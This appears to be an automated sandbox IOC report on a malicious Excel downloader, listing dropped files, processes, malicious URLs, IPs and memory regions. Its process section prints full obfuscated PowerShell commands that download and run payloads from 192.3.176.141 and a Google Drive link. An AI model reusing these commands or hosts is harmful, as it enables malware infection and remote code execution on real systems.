IOC Report
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:49:36 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
data
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\educationalthingswithgreatattitudeonhere[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1AD36F6.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\2whqha0s.5gp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RESB606.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 19:22:51 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\cxpovzpe.jz0.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\hrd142a2.xme.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
dropped
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\onmobile.052.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\oy5ige3r.s3s.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\rkssuzly.mkd.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\rsexq0o0.otx.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ty0431oy.k2y.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF22AE04FAAD033A29.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF449E3A8D3C8ED422.TMP
data
dropped
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
data
modified
C:\Users\user\Desktop\09230000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
dropped
C:\Users\user\Desktop\09230000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
dropped
There are 19 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"

URLs

Name
IP
Malicious
http://kbfvzoboss.bid/alien/fre.php
malicious
http://alphastand.top/alien/fre.php
malicious
malicious
http://alphastand.win/alien/fre.php
malicious
http://alphastand.trade/alien/fre.php
malicious
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
192.3.176.141
malicious
http://94.156.177.220/simple/five/fre.php
94.156.177.220
malicious
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
192.3.176.141
malicious
http://192.3.176.141/35/SMLPERR.txt
192.3.176.141
malicious
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaf
unknown
http://nuget.org/NuGet.exe
unknown
https://mpa.li/ZDFWtO
5.159.62.244
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htag
unknown
http://192.3.176.141/35/educatio
unknown
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFp
unknown
http://crl.entrust.net/server1.crl0
unknown
https://mpa.li/
unknown
http://192.3.176.141/
unknown
http://ocsp.entrust.net03
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta_
unknown
http://www.ibsensoftware.com/
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaw
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htal
unknown
http://go.micros
unknown
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF34e089r
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htak
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaG
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://mpa.li/C:T
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaA
unknown
http://192.3.176.141/Z
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htahttp://192.3.176.
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta...
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaS
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://mpa.li/6432H
unknown
There are 37 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.186.46
drive.usercontent.google.com
172.217.16.193
mpa.li
5.159.62.244

IPs

IP
Domain
Country
Malicious
192.3.176.141
unknown
United States
malicious
94.156.177.220
unknown
Bulgaria
malicious
142.250.186.46
drive.google.com
United States
5.159.62.244
mpa.li
Germany
5.159.62.243
unknown
Germany
172.217.16.193
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
)20
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28546
28546
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
t70
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3299F
3299F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32A7A
32A7A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 49 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
900000
heap
page read and write
malicious
41A000
heap
page read and write
3841000
heap
page read and write
466000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
26F000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
3E6C000
heap
page read and write
2726000
trusted library allocation
page read and write
1A5B8000
heap
page execute and read and write
2A98000
trusted library allocation
page read and write
397000
heap
page read and write
1B11E000
stack
page read and write
1D10000
heap
page read and write
500000
heap
page read and write
2816000
trusted library allocation
page read and write
20BB000
heap
page read and write
466000
heap
page read and write
2880000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
251000
heap
page read and write
10000
heap
page read and write
1C68F000
stack
page read and write
2976000
trusted library allocation
page read and write
44F000
heap
page read and write
40E0000
heap
page read and write
4E7000
heap
page read and write
2B10000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
3859000
heap
page read and write
7FE89A94000
trusted library allocation
page read and write
1C201000
heap
page read and write
399000
heap
page read and write
3F4000
heap
page read and write
1C7B000
heap
page read and write
230E000
stack
page read and write
4CF000
heap
page read and write
1ACBE000
stack
page read and write
3260000
trusted library allocation
page read and write
1AF0000
heap
page read and write
2824000
trusted library allocation
page read and write
3840000
heap
page read and write
388000
heap
page read and write
42D9000
heap
page read and write
33F000
heap
page read and write
386E000
heap
page read and write
254000
heap
page read and write
4E1000
heap
page read and write
7FE89893000
trusted library allocation
page execute and read and write
B78000
unkown
page readonly
355000
heap
page read and write
10000
heap
page read and write
2EBB000
stack
page read and write
260000
heap
page read and write
430A000
heap
page read and write
2B4000
heap
page read and write
25BF000
stack
page read and write
16C000
stack
page read and write
1A6A0000
heap
page read and write
1A9FB000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
196000
heap
page read and write
2982000
trusted library allocation
page read and write
3F4000
heap
page read and write
3DD000
heap
page read and write
2975000
trusted library allocation
page read and write
43F000
heap
page read and write
3B7000
heap
page read and write
399000
heap
page read and write
1C550000
heap
page read and write
270C000
trusted library allocation
page read and write
317000
heap
page read and write
2F40000
trusted library allocation
page read and write
413000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
42D9000
heap
page read and write
3EF5000
heap
page read and write
4E1000
heap
page read and write
37E6000
heap
page read and write
37F3000
heap
page read and write
4D0000
heap
page read and write
1F90000
direct allocation
page read and write
4A0000
remote allocation
page execute and read and write
1D90000
trusted library allocation
page read and write
160000
heap
page read and write
5069000
trusted library allocation
page read and write
248D000
trusted library allocation
page read and write
3861000
heap
page read and write
1B29E000
direct allocation
page read and write
2750000
trusted library allocation
page read and write
1A936000
heap
page read and write
37F0000
heap
page read and write
1FA3000
direct allocation
page read and write
386E000
heap
page read and write
20000
heap
page read and write
2F10000
trusted library allocation
page read and write
40F000
heap
page read and write
1BA000
heap
page read and write
430C000
heap
page read and write
4D4000
heap
page read and write
37C000
heap
page read and write
42D2000
heap
page read and write
12031000
trusted library allocation
page read and write
1DC6000
heap
page read and write
42D9000
heap
page read and write
1A859000
stack
page read and write
7FE89A40000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
3786000
heap
page read and write
4F0000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
3F8000
heap
page read and write
384000
heap
page read and write
41A000
heap
page read and write
1B33F000
stack
page read and write
3F21000
heap
page read and write
45A000
heap
page read and write
394000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
390000
heap
page read and write
3B7000
heap
page read and write
4E1000
heap
page read and write
7FE89956000
trusted library allocation
page read and write
8F5000
heap
page read and write
40C1000
heap
page read and write
397000
heap
page read and write
42DA000
heap
page read and write
1E14000
heap
page read and write
318000
heap
page read and write
297B000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
3D0000
heap
page read and write
312000
heap
page read and write
1F30000
direct allocation
page read and write
1B3DC000
stack
page read and write
3F16000
heap
page read and write
3F22000
heap
page read and write
7FE898BB000
trusted library allocation
page read and write
1F70000
direct allocation
page read and write
42FF000
heap
page read and write
3882000
heap
page read and write
4CF000
heap
page read and write
3B80000
trusted library allocation
page read and write
25F6000
heap
page read and write
4E7000
heap
page read and write
430C000
heap
page read and write
40A1000
heap
page read and write
430A000
heap
page read and write
388F000
heap
page read and write
10000
heap
page read and write
2E91000
trusted library allocation
page read and write
399000
heap
page read and write
3F2F000
heap
page read and write
27C000
heap
page read and write
1A62E000
stack
page read and write
7FE89B80000
trusted library allocation
page read and write
2363000
trusted library allocation
page read and write
1F97000
direct allocation
page read and write
1FA3000
direct allocation
page read and write
1CED000
direct allocation
page read and write
3F2F000
heap
page read and write
37F0000
heap
page read and write
31D0000
heap
page read and write
1AC00000
heap
page read and write
3249000
trusted library allocation
page read and write
2400000
trusted library allocation
page read and write
3FA000
heap
